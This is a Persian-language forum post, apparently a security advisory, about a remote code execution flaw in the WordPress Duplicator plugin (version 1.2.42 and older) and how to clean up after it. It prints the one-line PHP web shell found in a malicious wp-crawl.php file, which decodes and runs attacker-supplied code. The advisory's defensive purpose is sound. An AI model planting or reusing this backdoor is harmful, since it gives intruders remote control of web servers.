خوش آمدید به انجمن ای فری

بازدیدکننده گرامی برای دسترسی به تمامی امکانات در انجمن عضو شوید. پس از ثبت نام و ورود به سیستم ، می توانید موضوعات ایجاد کنید ، پاسخ به موضوعات موجود ارسال کنید ، به اعضای انجمن امتیاز دهید ، اقدام به خرید و فروش کنید ، و موارد دیگر. عضویت، سریع و کاملاً رایگان است ، پس منتظر چی هستی؟

درخواست راهنمایی

اگر نیاز به راهنمایی دارید درخواست خود را ثبت کنید

فروشگاه

قالب و افزونه و محصولات خود را میتوانید اینجا خرید و فروش کنید

دانلود منابع

قالب و افزونه های جدید و بروز را میتوایند از اینجا دانلود کنید

WALKER

مدیر کل انجمن
عضویت
11/13/18
ارسال ها
5,487
امتیاز واکنش
5,392
امتیاز
113
محل سکونت
tehran
812

در نسخه 1.2.42 و پایین تر افزونه Duplicator یک حفره امنیتی وجود دارد به نحوی که امکان اجرای کد بصورت ریموت را به هکرها می دهد (Remote Code Execution (RCE) ) ، هکر ها از این باگ امنیتی سطح بالا استفاده کرده و بصورت گسترده تعدادی زیادی از سایت های وردپرسی در سطح جهان را هک کرده اند.
توجه داشته باشید صرفا نصب افزونه Duplicator مشکلی امنیتی برای سایت ایجاد نمی کند اما بعد از استفاده از آن و ایجاد بسته نصبی، سایت در معرض هک شدن قرار می گیرد.
بعد از نصب قالب از طریق بسته نصبی فایل‌های database.php، installer.php، installer-backup.php، installer-log.txt و installer-data.sql و پوشه wp-snapshot نیز در کنار سایر فایل‌های پیشفرض وردپرس قرار می گیرند. در بسیاری موارد نیز کاربران فراموش می کنند فایل های نصبی افزونه داپلیکیتور را حذف کنند و مشکل دقیقا از همین جا شروع می شود، هکر می تواند با دسترسی به فایل نصبی اقدام به تغییرات گسترده در فایل wp-config.php و در نتیجه ریست کردن کامل اطلاعات درون این فایل کند و در اولین قدم سایت از دسترس خارج می شود.
برای رفع مشکل پیشنهاد می شود مراحل زیر را انجام دهید:

1. در اولین قدم فایل های زیر را از هاست حذف نمائید:
کد
The ZIP archive (unique)
database.sql
installer-backup.php
installer-data.sql
installer-log.txt
installer.php
2. درصورتیکه در هاست شما و در پوشه public_html فایل wp-crawl.php
را مشاهده می کنید، سریعا آن را حذف نمائید. این فایل مخرب بوده و دسترسی لازم را به هکر می دهد تا دسترسی به هاست شما داشته باشد. نمونه کدی که در فایل ذکر شده مشاهده شده است بصورت زیر است:
کد
<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');
3:غیر فعال کردن و یا حذف افزونه Duplicator از وردپرس، البته در صورتیکه افزونه Duplicator را به آخرین نسخه آپدیت و فایل نصبی را حذف نمائید خطری سایت شما را تهدید نمی کند.
4:برای در دسترس قرار دادن مجدد سایت نیز فایل خام wp-config.php را در هاست آپلود کرده ( می توانید جدیدترین نسخه وردپرس را از سایت رسمی آن دانلود و فایل فوق را از آن استخراج نمائید ) و اطلاعات دیتابیس را مجدد در درون آن قرار دهید تا سایت شما مجدد در دسترس قرار گیرد.

همواره می توانید با رعایت موارد امنیتی در سایت های وردپرسی تا حدی زیادی از هک و یا ویروسی شدن سایت جلوگیری کنید، پیشنهاد می شود موارد ذکر شده در لینک زیر را بصورت کامل در سایت وردپرسی خود انجام دهید :
 
shape1
shape2
shape3
shape4
shape7
shape8
بالا